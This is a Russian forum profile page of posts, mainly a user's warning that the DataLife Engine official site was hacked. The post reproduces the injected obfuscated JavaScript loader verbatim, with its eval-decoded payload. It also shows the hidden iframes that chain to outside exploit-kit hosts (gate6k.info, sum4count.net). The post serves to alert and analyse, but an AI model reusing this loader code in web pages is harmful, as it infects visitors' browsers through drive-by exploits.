Перейти к публикации

Greeze

местные
 Просмотреть профиль  Активность

  • Публикации

    893

  • Зарегистрирован

  • Посещение

 Тип публикации 

Сообщения, опубликованные пользователем Greeze

    GzipOut(true)

    в Прием багов

    Опубликовано:

    можно минимизировать, сжать Gzip'ом JS-файл и положить в туже папку

    поможешь с реализацией?

    JS файлы сжимаются спец. алгоритмами

    да, но с помощью gzip мы можем дополнительно уменьшить их размер.

    Взлом -(

    в DataLife Engine (Общие вопросы)

    Опубликовано: · Изменено пользователем Greeze

    Взлом dle-news.ru. Подробности.

    http://www.nulled.ws/showthread.php?t=71436

    Сорри за такую кричащую тему, да еще в такой поздний час (02.40 местного)? но если это не подмена содержимого, не правка DNS в серваке.... то... )))

    Случайно решил зайти на офф.сайт и при загрузки сработал антизверь. Антизверь параноик, и увидив знакомое сочетание в домене google, я разрешил ему выполнить скрипт.

    Совственно сижу под оперой и ничего страшного не произошло.

    пока писал, решил еще раз глянуть, скрипт отработал по новой (куки потер, ИП сменил для верности) и выкинул новый фрейм, скриншот с воплями авиры смотреть здесь http://imageshost.ru/links/c95a15ef6...d96b5f4035e5ca

    Озадачало только появление рекламы с гугля на сайте целсофта, который поидее еще до 6 в отпуске.

    Открываю исходник главной страницы? гуглом и не пахнет, а вижу ЛЕВЫЙ код, сначало не поверил.

    <body><script language=JavaScript>	function mdnbn15(p) {	var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,53,1,49,52,51,14,46,10,27,0,0,0,0,0,0,24,11,60,12,44,43,5,3,15,59,36,30,5

5,58,45,29,8,38,6,26,13,19,4,7,31,0,50,0,0,0,0,41,0,48,16,20,21,28,22,2,42,54,18

,

23,17,25,62,9,37,34,61,56,47,40,35,57,39,32,33);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(198^j&255);j>>=8;d-=2}else{d=6}}}eval(c);}}mdnbn15('3n8hqQSDukEDx8ID17XsgQ8hvRK0qQS_57Muu8AM3jIEZ6hIzE0EyjI_E6hwuKMhv7tB3U0ri9KN

4fMnJIhDZSA0_xKux8IuaL8Mtq8u_Q7D_xXsNts_ZM8M4QMDu8hIAKhD7q6Nxqhu_7hIt5nra0tr00KI

z

AXB4XtrzLKsJ9KDt8hD77tB5Wtw76MEzMhDIkXBQkED0hMuIU7utfENhKMtBvShu68wsEXMtg8Nx7Mus

W

nI')	</script><!-- dle-news.ru -->

<script language="javascript" type="text/javascript">

<!--

var dle_root	   = '/';
    после расшифровки получаем 
    window.status='Done';document.write('<iframe name=47210 src="http://gate6k.info/t/?'+Math.round(Math.random()*16909)+'47210'+'" width=457 height=37 style="display:none"></iframe>')
    т.е. открывается фрейм по адресу http://gate6k.info/t/?_РНД_47210 причем открывается один раз - фильт по кукам + ip, если один раз у вас страница подгружалась - то выдается 404. смотрим 
    <iframe name=1c53b80a90 src='http://sum4count.net/strong/188/?cd6f51' width=399 height=60 style='display:none;'></iframe>
    грузим, смотрим 
    <html>

<body>

<script>

document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%65%32%2E%68%74%6D%6C%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%6D%70%39%2E%68%74%6D%6C%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%3E%3C%2F%69%66%72%61%6D%65%3E"));

</script>

</body>

</html>
    дешифруем 
    <iframe src="e2.html" width="1" height="1"></iframe>

<iframe src="mp9.html" width="1" height="1"></iframe>

    короче мне надоело, это явно одна из последних сязок сплоитов под распространенные браузеры.

    как я понял выдают страницы RNВ со сплоитами, и если вы опять на них были - идет переадресация, в моем случае при первых попытках "пройтись до конца" была на msn.com

    под оперой 9.52 ничего не пристает. у кого ишак - даже не думайте, FF... хз.

    ИТОГО.

    КАК и через что внесли коррективы в сайт целсофта я НЕ знаю.

    либо хостер, либо шаблон через админку, либо пароль через троян на фтп... всяко может быть.

    зыы. проверил через разные php анамайзеры, код висит, значит точно не dns

    Добавлено через 6 минут

    ВНИМАНИЕ.

    ТАК ЖЕ ЗАРАЖЕННЫМ оказался Украинский сайт DLE

    вредоносный код прописан в файле

    http://www.nulled.ws/redirector.php?url=ht...Fjs%2Fstyles.js

    ну и естественно demo.dle-news.ru

    по остальным раскрученным врое тихо

×
×
  • Создать...